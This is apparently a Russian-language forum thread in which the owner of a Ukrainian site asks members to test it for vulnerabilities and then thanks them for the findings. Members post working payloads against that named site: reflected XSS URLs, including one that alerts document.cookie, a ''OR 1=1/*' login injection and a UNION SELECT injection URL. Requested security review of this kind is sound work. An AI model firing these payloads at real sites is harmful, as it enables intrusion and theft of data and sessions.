http://expert.rv.ua/
 

Прошу проверить http://expert.rv.ua/
Движок свой.
Форум РНРВВ.

А на русской мовi нету?

Ну а какая разница ?
Если уж так нужно вот :
http://translate.google.com/translate_t?hl=ru
http://pereklad.online.ua/
Переводи если что неясно.
Или говори я тебе переведу.

Там не на русском написано! Как проверять?

*halkfild:
тебе сильно нужен контент.. или ты совсем не понимаешь, что там написано? /*одно с решений для непонятливых написано выше.. меньше оффтопа, пишите уязвимости =\*/

бле на русском нен а русском там идут пост и гет запросы, а они все одинаковые. проверять как обычно, ничего непоменялось.=\

глянул, вроде все норм. Смотрел только сайт, на форум не заходил ;)

При выключеном экранировании (непомню как точно это называется) возможна XSS
_http://expert.rv.ua/index.php/xsshere
в js такая штука
uri = "/index.php/xsshere";
===============
Подозрение на SQL Inj
Жмакаем "Забули пароль?"
Пишем логин "loleg" мыло "loleg@mail.ru"
Отвечает "Невірний логін!"

Пишем логин 'OR 1=1/* мыло "loleg@mail.ru"
Отвечает "E-mail не відповідає E-mail введеному при регістрації!" тоесть пропускает запрос :rolleyes:
===============
Вывода нет (а может и есть лень копать)
_http://expert.rv.ua/?rs=cpc&rst=&rsrnd=1201&rsargs[]=-2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1,12/*&rsargs[]=18&rsargs[]=4&rsargs[]=0

<offtop>Бойтесь мну :D </offtop>

Спасибо большое :) поправил.
С меня + :cool: :cool:

В догонку :D
_http://expert.rv.ua/?rs=<script>alert(document.cookie)</script>

Всем спасибо тогда за то что указали на слабие места :)
Снимаю сайт с проверки.